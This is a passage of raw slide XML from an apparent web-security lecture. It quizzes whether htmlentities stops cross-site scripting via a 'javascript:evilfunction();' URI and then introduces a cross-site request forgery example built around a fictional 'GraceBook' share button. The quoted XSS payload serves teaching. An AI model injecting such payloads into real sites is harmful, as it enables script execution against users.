              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>running</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>htmlentitie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" spc="-880" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2133" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>javascript:evilfunction();</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="73" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> sufficient</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>cross</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-707" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>scripting?</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-87" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>out</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> entities</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>online</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2667" u="sng" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.functions-online.com/htmlentities.html</a:t>
            </a:r>
            <a:endParaRPr sz="2667">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr sz="2733">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Yes</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-458035">
              <a:spcBef>
                <a:spcPts val="513"/>
              </a:spcBef>
              <a:buAutoNum type="alphaLcPeriod"/>
              <a:tabLst>
                <a:tab pos="474968" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2133" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>No</a:t>
            </a:r>
            <a:endParaRPr sz="2133">
              <a:latin typeface="Courier New"/>
              <a:cs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2073148" y="2462302"/>
            <a:ext cx="8046720" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Cross-site Request</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-67" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-27" dirty="0"/>
              <a:t>Forgery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3004311" y="450638"/>
            <a:ext cx="6184900" cy="695062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr spc="-20" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-13" dirty="0"/>
              <a:t>Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714588" y="1502663"/>
            <a:ext cx="10738273" cy="4810270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="138853" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933" marR="165096">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1093"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Consider</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>social</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>networking</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>site,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GraceBook,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>allows</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘share’ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>happenings</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>around</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-887" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Users </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>can click </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>“Share </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>with </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>GraceBook” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>button</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>which</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>publishes</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> GraceBook.</a:t>
            </a:r>
            <a:endParaRPr sz="4000">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr sz="4667">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="16933" marR="6773">
              <a:lnSpc>
                <a:spcPct val="80100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>h</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>en </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>us</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-67" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ess the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>sha</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>POS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-1493" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-53" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>t  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" u="heavy" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="0000FF"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.gracebook.com/share.php</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4000" dirty="0">
                <a:latin typeface="Calibri"/>
